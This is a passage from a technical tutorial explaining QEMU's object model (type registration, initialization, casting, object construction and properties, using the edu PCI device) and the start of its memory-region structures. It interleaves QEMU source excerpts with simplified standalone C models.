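    }
    return NULL;
}

/* Returns the new TypeImpl, or NULL for a duplicate name (QEMU aborts instead). */
static TypeImpl *type_register(const TypeInfo *info)
{
    if (type_table_lookup(info->name)) return NULL;

    TypeImpl *ti = calloc(1, sizeof(*ti));
    if (!ti) abort();
    ti->name = dup_string(info->name);      /* the table owns private copies */
    ti->parent = dup_string(info->parent);
    ti->instance_size = info->instance_size;

    ti->next = type_table;                  /* insert into the table */
    type_table = ti;
    return ti;
}
```

Note that the parent is stored only as a name at this point. Resolving it to a TypeImpl pointer is deferred until the type is first used, which is why registration order between parent and child does not matter.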
TypeImpl holds all the information about a type. It is defined as follows:
struct TypeImpl
{
    const char *name;

    size_t class_size;

    size_t instance_size;

    void (*class_init)(ObjectClass *klass, void *data);
    void (*class_base_init)(ObjectClass *klass, void *data);

    void *class_data;

    void (*instance_init)(Object *obj);
    void (*instance_post_init)(Object *obj);
    void (*instance_finalize)(Object *obj);

    bool abstract;

    const char *parent;
    TypeImpl *parent_type;

    ObjectClass *class;

    int num_interfaces;
    InterfaceImpl interfaces[MAX_INTERFACES];
};
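Type initialization
A class is initialized by type_initialize. The function is not long; its input is ti, the TypeImpl describing the type. It first checks ti->class: if the pointer is non-NULL, the type has already been initialized and the function returns immediately.
if (ti->class) {
    return;
}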
After that it does three main things.
First, it sets the relevant fields, such as class_size and instance_size, and allocates an ObjectClass of ti->class_size bytes.
ti->class_size = type_class_get_size(ti);
ti->instance_size = type_object_get_size(ti);

if (ti->instance_size == 0) {
    ti->abstract = true;
}
if (type_is_ancestor(ti, type_interface)) {
    assert(ti->instance_size == 0);
    assert(ti->abstract);
    assert(!ti->instance_init);
    assert(!ti->instance_post_init);
    assert(!ti->instance_finalize);
    assert(!ti->num_interfaces);
}
ti->class = g_malloc0(ti->class_size);
Second, it initializes all parent types. This covers not only concrete types but also abstract ones such as interfaces.
parent = type_get_parent(ti);
if (parent) {
    type_initialize(parent);
    GSList *e;
    int i;

    g_assert(parent->class_size <= ti->class_size);
    g_assert(parent->instance_size <= ti->instance_size);
    memcpy(ti->class, parent->class, parent->class_size);
    ti->class->interfaces = NULL;
    ti->class->properties = g_hash_table_new_full(
        g_str_hash, g_str_equal, NULL, object_property_free);

    for (e = parent->class->interfaces; e; e = e->next) {
        InterfaceClass *iface = e->data;
        ObjectClass *klass = OBJECT_CLASS(iface);

        type_initialize_interface(ti, iface->interface_type, klass->type);
    }

    for (i = 0; i < ti->num_interfaces; i++) {
        TypeImpl *t = type_get_by_name(ti->interfaces[i].typename);
        if (!t) {
            error_report("missing interface '%s' for object '%s'",
                         ti->interfaces[i].typename, parent->name);
            abort();
        }
        for (e = ti->class->interfaces; e; e = e->next) {
            TypeImpl *target_type = OBJECT_CLASS(e->data)->type;

            if (type_is_ancestor(target_type, t)) {
                break;
            }
        }

        if (e) {
            continue;
        }

        type_initialize_interface(ti, t, t);
    }
} else {
    ti->class->properties = g_hash_table_new_full(
        g_str_hash, g_str_equal, NULL, object_property_free);
}

ti->class->type = ti;
Third, it calls class_base_init of every ancestor and then the type's own class_init. This resembles C++, where constructing an object runs the constructors of all base classes in turn. Concretely:
class_base_init of each ancestor is called in turn, walking the ancestor chain upward from the direct parent;
only the type's own class_init is called (each ancestor's class_init already ran when that ancestor was initialized).
while (parent) {
    if (parent->class_base_init) {
        parent->class_base_init(ti->class, ti->class_data);
    }
    parent = type_get_parent(parent);
}

if (ti->class_init) {
    ti->class_init(ti->class, ti->class_data);
}
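The three steps can be condensed into a standalone model. This is a sketch under simplifying assumptions, not QEMU's implementation: parents are linked by pointer rather than looked up by name, interfaces and properties are left out, the callbacks take no class_data argument, and the field is spelled `klass`. The `describe` method, the `base_init_calls` counter, and the three demo types are hypothetical.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

typedef struct TypeImpl TypeImpl;

typedef struct ObjectClass {
    TypeImpl *type;
    int (*describe)(void);      /* a "virtual method" stored in the class */
    int base_init_calls;        /* how many ancestor class_base_init hooks ran */
} ObjectClass;

struct TypeImpl {
    const char *name;
    TypeImpl *parent_type;
    size_t class_size;          /* 0 means "inherit the parent's class_size" */
    ObjectClass *klass;         /* NULL until the type is initialized */
    void (*class_init)(ObjectClass *klass);
    void (*class_base_init)(ObjectClass *klass);
};

static void type_initialize(TypeImpl *ti)
{
    if (ti->klass) return;                      /* already initialized */

    TypeImpl *parent = ti->parent_type;
    if (parent) {
        type_initialize(parent);                /* parents first */
        if (ti->class_size == 0) ti->class_size = parent->class_size;
    }

    ti->klass = calloc(1, ti->class_size);
    if (!ti->klass) abort();
    if (parent) {
        /* Inherit the parent's class contents, including method pointers. */
        memcpy(ti->klass, parent->klass, parent->class_size);
    }
    ti->klass->type = ti;

    /* Ancestors' class_base_init, from the direct parent upward... */
    for (; parent; parent = parent->parent_type) {
        if (parent->class_base_init) parent->class_base_init(ti->klass);
    }
    /* ...then only this type's own class_init. */
    if (ti->class_init) ti->class_init(ti->klass);
}

static int base_describe(void)  { return 1; }
static int child_describe(void) { return 2; }
static void base_class_init(ObjectClass *k)      { k->describe = base_describe; }
static void base_class_base_init(ObjectClass *k) { k->base_init_calls++; }
static void child_class_init(ObjectClass *k)     { k->describe = child_describe; }

static TypeImpl base_type  = { "base",  NULL,       sizeof(ObjectClass), NULL,
                               base_class_init, base_class_base_init };
static TypeImpl child_type = { "child", &base_type, 0, NULL, child_class_init, NULL };
static TypeImpl plain_type = { "plain", &base_type, 0, NULL, NULL, NULL };
```

Initializing `child_type` initializes `base_type` as a side effect. `child_type` overrides `describe` in its class_init, while `plain_type`, which has no class_init, keeps the pointer copied from its parent.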
type_initialize can be reached from many places, but only the first call does any work; later calls return immediately because ti->class is already set.
The following path shows one way type_initialize gets called. If QEMU is started without a machine argument, main calls select_machine, which uses find_default_machine to pick the default machine type. Before that call, object_class_get_list is used to obtain the list of all TYPE_MACHINE types.
int main(int argc, char **argv, char **envp)
  > machine_class = select_machine();
    > GSList *machines = object_class_get_list(TYPE_MACHINE, false);
    > MachineClass *machine_class = find_default_machine(machines);
object_class_get_list calls object_class_foreach, which invokes object_class_foreach_tramp on every type in type_table; that function in turn calls type_initialize.
GSList *object_class_get_list(const char *implements_type,
                              bool include_abstract)
{
    GSList *list = NULL;

    object_class_foreach(object_class_get_list_tramp,
                         implements_type, include_abstract, &list);
    return list;
}

void object_class_foreach(void (*fn)(ObjectClass *klass, void *opaque),
                          const char *implements_type, bool include_abstract,
                          void *opaque)
{
    OCFData data = { fn, implements_type, include_abstract, opaque };

    enumerating_types = true;
    g_hash_table_foreach(type_table_get(), object_class_foreach_tramp, &data);
    enumerating_types = false;
}

static void object_class_foreach_tramp(gpointer key, gpointer value,
                                       gpointer opaque)
{
    OCFData *data = opaque;
    TypeImpl *type = value;
    ObjectClass *k;

    type_initialize(type);
    k = type->class;

    if (!data->include_abstract && type->abstract) {
        return;
    }

    if (data->implements_type &&
        !object_class_dynamic_cast(k, data->implements_type)) {
        return;
    }

    data->fn(k, data->opaque);
}
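Type hierarchy
The edu device's type information (edu_info) has a parent field that names its parent type.
For edu the parent is TYPE_PCI_DEVICE. The parent of TYPE_PCI_DEVICE is TYPE_DEVICE, and above that is TYPE_OBJECT. The inheritance chain is therefore TYPE_OBJECT → TYPE_DEVICE → TYPE_PCI_DEVICE → edu.
All QEMU types hang off this tree rooted at TYPE_OBJECT.
During type initialization (type_initialize), QEMU allocates memory for the "class object". It is not a C++ class, but it plays a similar role: it stores the type's method table and metadata (callbacks, identification fields, and so on).
ti->class = g_malloc0(ti->class_size);
class_size determines the layout of this class object, that is, which struct it is. If a type does not specify its own class_size, it uses the parent type's class_size.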
To restate with the source: the parent member of edu_info names the parent type, and following the code gives the chain edu → TYPE_PCI_DEVICE → TYPE_DEVICE → TYPE_OBJECT. Taken together, the types used by QEMU form a tree rooted at TYPE_OBJECT.
static const TypeInfo edu_info = {
    .name          = TYPE_PCI_EDU_DEVICE,
    .parent        = TYPE_PCI_DEVICE,
    .instance_size = sizeof(EduState),
    .instance_init = edu_instance_init,
    .class_init    = edu_class_init,
    .interfaces    = interfaces,
};
The edu type does not define its own class_size, so it inherits the class_size of its parent TYPE_PCI_DEVICE. The parent's class struct is PCIDeviceClass, so edu's class object is also a PCIDeviceClass (which contains callbacks such as realize/exit/config_read/config_write and identification fields such as vendor/device/class).
type_initialize allocates the class structure with ti->class = g_malloc0(ti->class_size). This structure represents the type's information, much like a class definition in C++. As shown earlier, ti->class_size comes from the TypeImpl; if the type does not define it, the parent type's class_size is used. The edu type does not define one, so its class_size is the value defined for TYPE_PCI_DEVICE, namely sizeof(PCIDeviceClass).
typedef struct PCIDeviceClass {
    DeviceClass parent_class;

    void (*realize)(PCIDevice *dev, Error **errp);
    PCIUnregisterFunc *exit;
    PCIConfigReadFunc *config_read;
    PCIConfigWriteFunc *config_write;

    uint16_t vendor_id;
    uint16_t device_id;
    uint8_t revision;
    uint16_t class_id;
    uint16_t subsystem_vendor_id;
    uint16_t subsystem_id;

    bool is_bridge;

    const char *romfile;
} PCIDeviceClass;
PCIDeviceClass carries information common to PCI devices, such as the vendor_id and device_id identifiers and the config_read and config_write functions for accessing PCI configuration space. Notably, its first member is a DeviceClass structure, which describes the attributes shared by every type that is a "device".
struct ObjectClass
{
    Type type;
    GSList *interfaces;

    const char *object_cast_cache[OBJECT_CLASS_CAST_CACHE];
    const char *class_cast_cache[OBJECT_CLASS_CAST_CACHE];

    ObjectUnparent *unparent;

    GHashTable *properties;
};

typedef struct DeviceClass {
    ObjectClass parent_class;
    ...
} DeviceClass;
DeviceClass defines the basic information and callbacks for device types. Its first member is again the Class of its parent type, ObjectClass. ObjectClass is the base of all types and is embedded as the first member of every other Class struct.
type_initialize uses the following code to initialize the part of the class that belongs to the parent type:
parent = type_get_parent(ti);
if (parent) {
    memcpy(ti->class, parent->class, parent->class_size);
}

if (ti->class_init) {
    ti->class_init(ti->class, ti->class_data);
}
For the edu device, class_init is edu_class_init:
static void edu_class_init(ObjectClass *class, void *data)
{
    DeviceClass *dc = DEVICE_CLASS(class);
    PCIDeviceClass *k = PCI_DEVICE_CLASS(class);

    k->realize = pci_edu_realize;
    k->exit = pci_edu_uninit;
    k->vendor_id = PCI_VENDOR_ID_QEMU;
    k->device_id = 0x11e8;
    k->revision = 0x10;
    k->class_id = PCI_CLASS_OTHERS;
    set_bit(DEVICE_CATEGORY_MISC, dc->categories);
}
Type casts
DEVICE_CLASS and PCI_DEVICE_CLASS both end up calling object_class_dynamic_cast.
The function first uses type_get_by_name to find the target TypeImpl; for PCI_DEVICE_CLASS the typename is TYPE_PCI_DEVICE.
ObjectClass *object_class_dynamic_cast(ObjectClass *class,
                                       const char *typename)
{
    ObjectClass *ret = NULL;
    TypeImpl *target_type;
    TypeImpl *type;

    if (!class) {
        return NULL;
    }

    type = class->type;
    if (type->name == typename) {
        return class;
    }

    target_type = type_get_by_name(typename);
    if (!target_type) {
        return NULL;
    }

    if (type->class->interfaces &&
            type_is_ancestor(target_type, type_interface)) {
        int found = 0;
        GSList *i;

        for (i = class->interfaces; i; i = i->next) {
            ObjectClass *target_class = i->data;

            if (type_is_ancestor(target_class->type, target_type)) {
                ret = target_class;
                found++;
            }
        }

        if (found > 1) {
            ret = NULL;
        }
    } else if (type_is_ancestor(type, target_type)) {
        ret = class;
    }

    return ret;
}
For edu, type->name is edu while the cast target is TYPE_PCI_DEVICE, so the function calls type_is_ancestor("edu", TYPE_PCI_DEVICE) to check whether the latter is an ancestor of the former.
type_is_ancestor walks up edu's parent chain and compares each type with TYPE_PCI_DEVICE. edu's TypeInfo names TYPE_PCI_DEVICE as its parent, so the check succeeds and the cast from ObjectClass to PCIDeviceClass is allowed. Because the parent Class is always the first member, the conversion itself is just the pointer cast (PCIDeviceClass *)ObjectClass.
static bool type_is_ancestor(TypeImpl *type, TypeImpl *target_type)
{
    assert(target_type);

    while (type) {
        if (type == target_type) {
            return true;
        }

        type = type_get_parent(type);
    }

    return false;
}

static TypeImpl *type_get_parent(TypeImpl *type)
{
    if (!type->parent_type && type->parent) {
        type->parent_type = type_get_by_name(type->parent);
        if (!type->parent_type) {
            fprintf(stderr, "Type '%s' is missing its parent '%s'\n",
                    type->name, type->parent);
            abort();
        }
    }

    return type->parent_type;
}
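The ancestor walk and the checked cast are easy to try in isolation. The sketch below is a simplified model, assuming a fixed array instead of the type hash table and ignoring interfaces and the cast caches; the type names in the array are illustrative strings, and `class_dynamic_cast` is a hypothetical stand-in for object_class_dynamic_cast.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

typedef struct TypeImpl {
    const char *name;
    const char *parent;             /* parent name, as given at registration */
    struct TypeImpl *parent_type;   /* resolved lazily on first use */
} TypeImpl;

/* Illustrative type table; QEMU keeps these in a hash table. */
static TypeImpl types[] = {
    { "object",     NULL,         NULL },
    { "device",     "object",     NULL },
    { "pci-device", "device",     NULL },
    { "edu",        "pci-device", NULL },
    { "machine",    "object",     NULL },
};

static TypeImpl *type_get_by_name(const char *name)
{
    for (size_t i = 0; i < sizeof(types) / sizeof(types[0]); i++) {
        if (strcmp(types[i].name, name) == 0) return &types[i];
    }
    return NULL;
}

/* Resolve and cache the parent pointer the first time it is needed. */
static TypeImpl *type_get_parent(TypeImpl *type)
{
    if (!type->parent_type && type->parent) {
        type->parent_type = type_get_by_name(type->parent);
    }
    return type->parent_type;
}

static bool type_is_ancestor(TypeImpl *type, TypeImpl *target_type)
{
    while (type) {
        if (type == target_type) return true;
        type = type_get_parent(type);
    }
    return false;
}

typedef struct ObjectClass { TypeImpl *type; } ObjectClass;

/* Returns klass if its type is target_name or a descendant of it, else NULL. */
static ObjectClass *class_dynamic_cast(ObjectClass *klass, const char *target_name)
{
    if (!klass) return NULL;
    TypeImpl *target = type_get_by_name(target_name);
    if (!target) return NULL;
    return type_is_ancestor(klass->type, target) ? klass : NULL;
}
```

A class whose type is "edu" casts successfully to "pci-device", "device", and "object", but the cast to the sibling branch "machine" yields NULL.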
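Object construction and initialization
To recap: each type first supplies a TypeInfo that is registered with the system; during startup each TypeInfo is turned into a TypeImpl and stored in a hash table. That is type registration. The types in the hash table are then initialized, which mainly means filling in TypeImpl fields and calling each type's class_init. That is type initialization. At this point the system knows about every type and their class initializers have run, so it can create instance objects, the objects of each type, as needed (for example according to the QEMU command line).
Consider the case where -device edu is given. main contains the following statement:
qemu_opts_foreach(qemu_find_opts("device"),
                  device_init_func, NULL, &error_fatal);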
For each -device argument, device_init_func is called, which in turn calls qdev_device_add to add the device. The object is constructed through object_new; the call chain is:
device_init_func
| dev = qdev_device_add(opts, errp);
| | dev = DEVICE(object_new(driver));
| | | TypeImpl *ti = type_get_by_name(typename);
| | | object_new_with_type(ti);
| | | | obj = g_malloc(type->instance_size);
| | | | object_initialize_with_type(obj, type->instance_size, type);
| | | | | object_init_with_type(obj, type);
| | | | | object_post_init_with_type(obj, type);
| | object_property_set_bool(OBJECT(dev), true, "realized", &err);
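object_initialize_with_type mainly calls object_init_with_type and object_post_init_with_type. The former recursively calls the instance initializers of all parent types and then the type's own; the latter calls the instance_post_init callback of the TypeImpl to finish up after initialization. The edu TypeInfo serves as the example below.
edu's instance_size is sizeof(EduState), so an object of type edu is in fact an EduState structure. Every object has a corresponding XXXState that records its state. Since edu is a PCI device, EduState holds device information such as interrupt state, device status, and the memory regions backing its MMIO and PIO. The argument passed around in object_init_with_type is always an Object, which shows that objects also have a parent/child relationship. As with types, QOM provides macros that convert a pointer to an Object into a pointer to a subclass object; the conversion works the same way as for ObjectClass.
struct Object
{
    ObjectClass *class;
    ObjectFree *free;
    GHashTable *properties;
    uint32_t ref;
    Object *parent;
};

struct DeviceState {
    Object parent_obj;
    /* other fields omitted */
};

struct PCIDevice {
    DeviceState qdev;
    /* other fields omitted */
};

typedef struct {
    PCIDevice pdev;
    /* other fields omitted */
} EduState;
Unlike type information and types, objects are created on demand: an object only comes into existence when a device is specified on the command line or hot-plugged. A type and its objects are tied together through the class field of Object, which object_initialize_with_type sets with obj->class = type->class.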
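The embedding and the parent-first initialization order can be illustrated with a standalone model. This is a sketch, not QEMU code: the structs keep only a field or two each, the extra fields (`realized`, `devfn`), the trace buffer, and the three instance_init functions are hypothetical, and post-init hooks are omitted.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

typedef struct Object Object;
typedef struct TypeImpl TypeImpl;
typedef struct ObjectClass { TypeImpl *type; } ObjectClass;

struct TypeImpl {
    const char *name;
    TypeImpl *parent_type;
    size_t instance_size;
    ObjectClass *klass;
    void (*instance_init)(Object *obj);
};

struct Object { ObjectClass *klass; };

/* Each level embeds its parent as the FIRST member, so one pointer fits all. */
typedef struct DeviceState { Object parent_obj; int realized; } DeviceState;
typedef struct PCIDevice   { DeviceState qdev;  int devfn;    } PCIDevice;
typedef struct EduState    { PCIDevice pdev; unsigned long long dma_mask; } EduState;

static char init_trace[8];      /* records the order in which inits ran */
static void trace(char c) { init_trace[strlen(init_trace)] = c; }

static void device_instance_init(Object *obj) { ((DeviceState *)obj)->realized = 0; trace('D'); }
static void pci_instance_init(Object *obj)    { ((PCIDevice *)obj)->devfn = -1;     trace('P'); }
static void edu_instance_init(Object *obj)
{
    ((EduState *)obj)->dma_mask = (1ULL << 28) - 1;
    trace('E');
}

/* Run instance_init for every ancestor first, then for the type itself. */
static void object_init_with_type(Object *obj, TypeImpl *ti)
{
    if (ti->parent_type) object_init_with_type(obj, ti->parent_type);
    if (ti->instance_init) ti->instance_init(obj);
}

static Object *object_new_with_type(TypeImpl *type)
{
    Object *obj = calloc(1, type->instance_size);   /* zeroed instance */
    if (!obj) abort();
    obj->klass = type->klass;                       /* link object to its class */
    object_init_with_type(obj, type);
    return obj;
}

static ObjectClass edu_class;
static TypeImpl object_type = { "object",     NULL,         sizeof(Object),      NULL, NULL };
static TypeImpl device_type = { "device",     &object_type, sizeof(DeviceState), NULL, device_instance_init };
static TypeImpl pci_type    = { "pci-device", &device_type, sizeof(PCIDevice),   NULL, pci_instance_init };
static TypeImpl edu_type    = { "edu",        &pci_type,    sizeof(EduState),    &edu_class, edu_instance_init };
```

Creating an object from `edu_type` leaves "DPE" in the trace buffer, and the address of the innermost `Object` equals the address of the `EduState`, which is what makes the pointer casts between levels valid.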
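In summary, QOM object construction can be divided into three parts:
The first part is type construction: the TypeInfo records are turned into a hash table of TypeImpl entries. The init functions are queued before main runs, and the table is filled when module_call_init(MODULE_INIT_QOM) runs early in main;
The second part is type initialization, which happens inside main. Both of these parts are global: they run for every QOM type compiled into the binary;
The third part is object construction, which creates concrete object instances. An object is only created when the corresponding device is requested, for example on the command line.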
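So far the object has only been constructed and its instance initializer called. The contents of EduState have not been filled in, and the edu device is not yet usable. For a device, the realized property still has to be set to true. Further down in qdev_device_add there is this statement:
object_property_set_bool(OBJECT(dev), true, "realized", &err);
It sets the realized property of dev (the edu device) to true. This leads to another aspect of QOM classes and objects: properties.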
Properties in QOM
To make objects easier to manage, QOM attaches properties to both types and objects. Class properties live in the properties field of ObjectClass, which is created in the type initialization function type_initialize. Object properties live in the properties field of Object, which is created in the object initialization function object_initialize_with_type. Both are hash tables mapping a property name to an ObjectProperty.
A property is represented by ObjectProperty:
struct ObjectProperty
{
    gchar *name;
    gchar *type;
    gchar *description;
    ObjectPropertyAccessor *get;
    ObjectPropertyAccessor *set;
    ObjectPropertyResolve *resolve;
    ObjectPropertyRelease *release;
    ObjectPropertyInit *init;
    void *opaque;
    QObject *defval;
};
Here name is the property name; type is the property type (some properties are strings, some are bool, and some are more complex types such as link); get, set, resolve, and the other callbacks operate on the property; opaque points to the concrete property structure, such as a BoolProperty.
Each concrete kind of property has its own struct. Below, LinkProperty describes a link property, StringProperty a string property, and BoolProperty a bool property.
typedef struct {
    union {
        Object **targetp;
        Object *target;
        ptrdiff_t offset;
    };
    void (*check)(const Object *, const char *, Object *, Error **);
    ObjectPropertyLinkFlags flags;
} LinkProperty;

typedef struct StringProperty
{
    char *(*get)(Object *, Error **);
    void (*set)(Object *, const char *, Error **);
} StringProperty;

typedef struct BoolProperty
{
    bool (*get)(Object *, Error **);
    void (*set)(Object *, bool, Error **);
} BoolProperty;
Taking Object as an example, the property-related structures are as follows:
Properties can be added to classes or to objects. For object properties, this is done through object_property_add. The listing below omits the handling of property names that contain the wildcard *:
ObjectProperty *
object_property_add(Object *obj, const char *name, const char *type,
                    ObjectPropertyAccessor *get,
                    ObjectPropertyAccessor *set,
                    ObjectPropertyRelease *release,
                    void *opaque, Error **errp)
{
    ObjectProperty *prop;
    size_t name_len = strlen(name);

    if (object_property_find(obj, name, NULL) != NULL) {
        error_setg(errp, "attempt to add duplicate property '%s'"
                   " to object (type '%s')", name,
                   object_get_typename(obj));
        return NULL;
    }

    prop = g_malloc0(sizeof(*prop));

    prop->name = g_strdup(name);
    prop->type = g_strdup(type);

    prop->get = get;
    prop->set = set;
    prop->release = release;
    prop->opaque = opaque;

    g_hash_table_insert(obj->properties, prop->name, prop);
    return prop;
}
object_property_add first calls object_property_find to make sure the property does not already exist, so duplicates are never added. It then allocates an ObjectProperty, initializes it from the arguments, and inserts it into the object's properties table with g_hash_table_insert.
Property lookup is done by object_property_find. The class-level helper it relies on, object_class_property_find, looks like this:
ObjectProperty *object_class_property_find(ObjectClass *klass, const char *name,
                                           Error **errp)
{
    ObjectProperty *prop;
    ObjectClass *parent_klass;

    parent_klass = object_class_get_parent(klass);
    if (parent_klass) {
        prop = object_class_property_find(parent_klass, name, NULL);
        if (prop) {
            return prop;
        }
    }

    prop = g_hash_table_lookup(klass->properties, name);
    if (!prop) {
        error_setg(errp, "Property '.%s' not found", name);
    }
    return prop;
}
object_property_find first calls object_class_property_find to search the object's class and all of its parent classes, and only if the property is not found there does it look in the object's own properties table. The helper shown above recurses into the parent class before consulting klass->properties.
Properties are set through object_property_set, which simply calls the set function of the ObjectProperty:
void object_property_set(Object *obj, Visitor *v, const char *name,
                         Error **errp)
{
    ObjectProperty *prop = object_property_find(obj, name, errp);
    if (prop == NULL) {
        return;
    }

    if (!prop->set) {
        error_setg(errp, QERR_PERMISSION_DENIED);
    } else {
        prop->set(obj, v, name, prop->opaque, errp);
    }
}
Each property type has its own set function named property_set_XXX, where XXX is the property type, such as bool, str, or link. The bool version is:
static void property_set_bool(Object *obj, Visitor *v, const char *name,
                              void *opaque, Error **errp)
{
    BoolProperty *prop = opaque;
    bool value;
    Error *local_err = NULL;

    visit_type_bool(v, name, &value, &local_err);
    if (local_err) {
        error_propagate(errp, local_err);
        return;
    }

    prop->set(obj, value, errp);
}
As shown, it calls the set function of the concrete property (BoolProperty), which was supplied when the property was created.
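The two-level dispatch (generic accessor on ObjectProperty, typed callback on BoolProperty) can be sketched without QEMU. The model below makes several simplifying assumptions: a linked list replaces the hash table, a plain string replaces the Visitor, errors are reported as -1 or NULL instead of through Error, and the property is never freed. `device_set_realized` and `realized_prop` are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>

typedef struct Object Object;

/* Typed property: knows how to store a bool on the object. */
typedef struct BoolProperty {
    bool (*get)(Object *obj);
    void (*set)(Object *obj, bool value);
} BoolProperty;

/* Generic property: name, type string, generic setter, and typed payload. */
typedef struct ObjectProperty {
    const char *name;
    const char *type;
    void (*set)(Object *obj, const char *value, void *opaque);
    void *opaque;
    struct ObjectProperty *next;
} ObjectProperty;

struct Object {
    ObjectProperty *properties;     /* per-object property table */
    bool realized;
};

static ObjectProperty *object_property_find(Object *obj, const char *name)
{
    for (ObjectProperty *p = obj->properties; p; p = p->next) {
        if (strcmp(p->name, name) == 0) return p;
    }
    return NULL;
}

/* Returns the new property, or NULL if the name is already taken. */
static ObjectProperty *object_property_add(Object *obj, const char *name,
                                           const char *type,
                                           void (*set)(Object *, const char *, void *),
                                           void *opaque)
{
    if (object_property_find(obj, name)) return NULL;
    ObjectProperty *prop = calloc(1, sizeof(*prop));
    if (!prop) abort();
    prop->name = name;
    prop->type = type;
    prop->set = set;
    prop->opaque = opaque;
    prop->next = obj->properties;
    obj->properties = prop;
    return prop;
}

/* Returns 0 on success, -1 if the property is missing or read-only. */
static int object_property_set(Object *obj, const char *name, const char *value)
{
    ObjectProperty *prop = object_property_find(obj, name);
    if (!prop || !prop->set) return -1;
    prop->set(obj, value, prop->opaque);
    return 0;
}

/* Generic setter for bool: decode the value, then call the typed setter. */
static void property_set_bool(Object *obj, const char *value, void *opaque)
{
    BoolProperty *prop = opaque;
    prop->set(obj, strcmp(value, "true") == 0);
}

static void device_set_realized(Object *obj, bool value) { obj->realized = value; }
static BoolProperty realized_prop = { NULL, device_set_realized };
```

Setting "realized" to "true" on an object travels through `object_property_set`, then `property_set_bool`, and finally `device_set_realized`, mirroring the path that realizes a device in QEMU.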
QEMU memory virtualization
QEMU memory structures
A MemoryRegion abstracts a range within an address space. It can be read/write RAM, MMIO implemented by callbacks, a bridge to I/O port space, an alias, an IOMMU entry point, read-only ROM/ROMD, or a pure container (container/root). Together the regions form a directed acyclic graph (DAG) describing the memory map, which is finally flattened into the mapping of an AddressSpace that CPUs and devices access.
The structure is defined in include/exec/memory.h:
struct MemoryRegion {
    Object parent_obj;

    bool romd_mode;
    bool ram;
    bool subpage;
    bool readonly;
    bool nonvolatile;
    bool rom_device;
    bool flush_coalesced_mmio;
    bool global_locking;
    uint8_t dirty_log_mask;
    bool is_iommu;
    RAMBlock *ram_block;
    Object *owner;

    const MemoryRegionOps *ops;
    void *opaque;
    MemoryRegion *container;
    Int128 size;
    hwaddr addr;
    void (*destructor)(MemoryRegion *mr);
    uint64_t align;
    bool terminates;
    bool ram_device;
    bool enabled;
    bool warning_printed;
    uint8_t vga_logging_count;
    MemoryRegion *alias;
    hwaddr alias_offset;
    int32_t priority;
    QTAILQ_HEAD(, MemoryRegion) subregions;
    QTAILQ_ENTRY(MemoryRegion) subregions_link;
    QTAILQ_HEAD(, CoalescedMemoryRange) coalesced;
    const char *name;
    unsigned ioeventfd_nb;
    MemoryRegionIoeventfd *ioeventfds;
};
The member functions of a MemoryRegion are collected in the MemoryRegionOps function table:
struct MemoryRegionOps {
    uint64_t (*read)(void *opaque,
                     hwaddr addr,
                     unsigned size);
    void (*write)(void *opaque,
                  hwaddr addr,
                  uint64_t data,
                  unsigned size);

    MemTxResult (*read_with_attrs)(void *opaque,
                                   hwaddr addr,
                                   uint64_t *data,
                                   unsigned size,
                                   MemTxAttrs attrs);
    MemTxResult (*write_with_attrs)(void *opaque,
                                    hwaddr addr,
                                    uint64_t data,
                                    unsigned size,
                                    MemTxAttrs attrs);

    enum device_endian endianness;

    struct {
        unsigned min_access_size;
        unsigned max_access_size;
        bool unaligned;
        bool (*accepts)(void *opaque, hwaddr addr,
                        unsigned size, bool is_write,
                        MemTxAttrs attrs);
    } valid;

    struct {
        unsigned min_access_size;
        unsigned max_access_size;
        bool unaligned;
    } impl;
};
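The read and write callbacks in MemoryRegionOps are only invoked when an access hits an IO-type region (MMIO, ROM device, or PMIO). Any other access reads or writes host memory directly.
Guest CPU memory access
        │
        ▼
AddressSpace (address book)
        │  table lookup
        ├──► MemoryRegion = RAM/ROM ──► read/write host memory directly
        └──► MemoryRegion = IO (device) ─► call ops.read / ops.write (your device code)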
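The dispatch in the diagram can be modeled in a few lines. This is a deliberately flat sketch, assuming a linear array of non-overlapping regions rather than QEMU's region tree and flat view; RAM is stored little-endian, accesses are at most 8 bytes, and `as_read`, `as_write`, `DemoDev`, and `demo_ops` are hypothetical names.

```c
#include <assert.h>
#include <stdint.h>
#include <stddef.h>

typedef uint64_t hwaddr;

typedef struct MemoryRegionOps {
    uint64_t (*read)(void *opaque, hwaddr addr, unsigned size);
    void (*write)(void *opaque, hwaddr addr, uint64_t data, unsigned size);
} MemoryRegionOps;

typedef struct MemoryRegion {
    hwaddr base;                    /* start address within the address space */
    hwaddr size;
    uint8_t *ram;                   /* non-NULL: RAM backed by host memory */
    const MemoryRegionOps *ops;     /* used when ram is NULL (IO region) */
    void *opaque;
} MemoryRegion;

typedef struct AddressSpace {
    MemoryRegion *regions;
    int nregions;
} AddressSpace;

/* Find the region that fully contains [addr, addr + size). */
static MemoryRegion *as_lookup(AddressSpace *as, hwaddr addr, unsigned size)
{
    for (int i = 0; i < as->nregions; i++) {
        MemoryRegion *mr = &as->regions[i];
        if (addr >= mr->base && size <= mr->size &&
            addr - mr->base <= mr->size - size) {
            return mr;
        }
    }
    return NULL;
}

/* Returns 0 on success, -1 if nothing is mapped at addr. */
static int as_write(AddressSpace *as, hwaddr addr, uint64_t data, unsigned size)
{
    MemoryRegion *mr = as_lookup(as, addr, size);
    if (!mr) return -1;
    hwaddr off = addr - mr->base;
    if (mr->ram) {
        for (unsigned i = 0; i < size; i++) {       /* RAM: store bytes directly */
            mr->ram[off + i] = (uint8_t)(data >> (8 * i));
        }
    } else {
        mr->ops->write(mr->opaque, off, data, size);    /* IO: device callback */
    }
    return 0;
}

static int as_read(AddressSpace *as, hwaddr addr, uint64_t *data, unsigned size)
{
    MemoryRegion *mr = as_lookup(as, addr, size);
    if (!mr) return -1;
    hwaddr off = addr - mr->base;
    if (mr->ram) {
        uint64_t v = 0;
        for (unsigned i = 0; i < size; i++) {
            v |= (uint64_t)mr->ram[off + i] << (8 * i);
        }
        *data = v;
    } else {
        *data = mr->ops->read(mr->opaque, off, size);
    }
    return 0;
}

/* Hypothetical device with one register; counts how often it is read. */
typedef struct DemoDev { uint64_t reg; unsigned reads; } DemoDev;
static uint64_t demo_read(void *opaque, hwaddr addr, unsigned size)
{
    DemoDev *d = opaque; (void)addr; (void)size;
    d->reads++;
    return d->reg;
}
static void demo_write(void *opaque, hwaddr addr, uint64_t data, unsigned size)
{
    DemoDev *d = opaque; (void)addr; (void)size;
    d->reg = data;
}
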